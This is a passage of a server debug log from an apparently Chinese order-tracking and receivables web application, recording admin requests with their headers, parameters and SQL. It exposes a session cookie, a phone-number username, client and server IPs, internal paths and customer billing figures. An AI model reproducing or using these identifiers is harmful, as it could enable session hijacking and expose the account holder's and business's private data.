app\admin\behavior\AdminLog @app_end [ RunTime:0.000107s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:50:05+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.047649s][吞吐率:20.99req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001093s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11829?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '157', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '157', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001488s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007764s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000497s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000766s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (157) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000353s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (157) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000358s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000928s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"157\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"157\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702205) [ RunTime:0.005772s ] --------------------------------------------------------------- [ 2025-12-14T16:52:45+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11829?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11829?dialog=1 [运行时间:0.164026s][吞吐率:6.10req/s] [内存消耗:6,206.49kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001130s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '932', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11829?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '许', 1 => '157', ), 'verify_amount' => array ( 0 => '8000', 1 => '8000', 2 => '10000', 3 => '10000', 4 => '10000', 5 => '10000', ), 'price' => array ( 0 => '8.1', 1 => '1.4000000000', 2 => '2.9', 3 => '0.9000000000', 4 => '2.47', 5 => '0.5300000000', ), 'money' => array ( 0 => '64800', 1 => '11200.0000000000', 2 => '29000', 3 => '9000.0000000000', 4 => '24700.000000000004', 5 => '5300.0000000000', ), 'explain' => array ( 0 => '320W-1厚底壳8000个', 1 => '320W-10上盖8000个', 2 => '100W-10底壳3孔10000个', 3 => '100W-2上盖10000个', 4 => '50W-14底壳10000个', 5 => '50W-3上盖10000个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'shoukuan_status-5' => '0', 'shoukuan_status-6' => '0', 'ids' => '11829', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001667s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009283s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000442s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000785s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000423s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000580s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001024s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000967s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000351s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000656s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000875s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000745s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000686s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000821s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11829' [ RunTime:0.015582s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=8000,`price`=8.1,`money`=64800 WHERE `id` = 27818 [ RunTime:0.005860s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.000893s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000395s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (157 , 40 , 53593 , 1080 , 11829 , 27818 , 1 , 2025 , 12 , 14 , '320W-1厚底壳8000个' , 1765702365 , 64800 , 10982061.790661) [ RunTime:0.005087s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=8000,`price`=1.4,`money`=11200 WHERE `id` = 27819 [ RunTime:0.006233s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000455s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (157 , 40 , 53594 , 1074 , 11829 , 27819 , 1 , 2025 , 12 , 14 , '320W-10上盖8000个' , 1765702365 , 11200 , 10993261.790661) [ RunTime:0.004904s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10000,`price`=2.9,`money`=29000 WHERE `id` = 27820 [ RunTime:0.005102s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000471s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (157 , 40 , 53595 , 1103 , 11829 , 27820 , 1 , 2025 , 12 , 14 , '100W-10底壳3孔10000个' , 1765702365 , 29000 , 11022261.790661) [ RunTime:0.005755s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10000,`price`=0.9,`money`=9000 WHERE `id` = 27821 [ RunTime:0.005585s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000451s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (157 , 40 , 53596 , 1104 , 11829 , 27821 , 1 , 2025 , 12 , 14 , '100W-2上盖10000个' , 1765702365 , 9000 , 11031261.790661) [ RunTime:0.005037s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10000,`price`=2.47,`money`=24700 WHERE `id` = 27822 [ RunTime:0.004443s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000416s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (157 , 40 , 53597 , 1120 , 11829 , 27822 , 1 , 2025 , 12 , 14 , '50W-14底壳10000个' , 1765702365 , 24700 , 11055961.790661) [ RunTime:0.004166s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10000,`price`=0.53,`money`=5300 WHERE `id` = 27823 [ RunTime:0.004116s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000406s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (157 , 40 , 53598 , 1123 , 11829 , 27823 , 1 , 2025 , 12 , 14 , '50W-3上盖10000个' , 1765702365 , 5300 , 11061261.790661) [ RunTime:0.005450s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001080s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u8bb8\",\"157\"],\"verify_amount\":[\"8000\",\"8000\",\"10000\",\"10000\",\"10000\",\"10000\"],\"price\":[\"8.1\",\"1.4000000000\",\"2.9\",\"0.9000000000\",\"2.47\",\"0.5300000000\"],\"money\":[\"64800\",\"11200.0000000000\",\"29000\",\"9000.0000000000\",\"24700.000000000004\",\"5300.0000000000\"],\"explain\":[\"320W-1\\u539a\\u5e95\\u58f38000\\u4e2a\",\"320W-10\\u4e0a\\u76d68000\\u4e2a\",\"100W-10\\u5e95\\u58f33\\u5b5410000\\u4e2a\",\"100W-2\\u4e0a\\u76d610000\\u4e2a\",\"50W-14\\u5e95\\u58f310000\\u4e2a\",\"50W-3\\u4e0a\\u76d610000\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"shoukuan_status-5\":\"0\",\"shoukuan_status-6\":\"0\",\"ids\":\"11829\"}' , '/admin/financial/verifybill/hedui/ids/11829?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702365) [ RunTime:0.006957s ] --------------------------------------------------------------- [ 2025-12-14T16:52:45+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970986 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970986 [运行时间:0.255667s][吞吐率:3.91req/s] [内存消耗:5,711.05kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001089s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970986', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001651s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000132s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000527s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000857s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000449s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000670s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001140s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000734s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000342s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000725s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000696s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000682s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.022910s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS 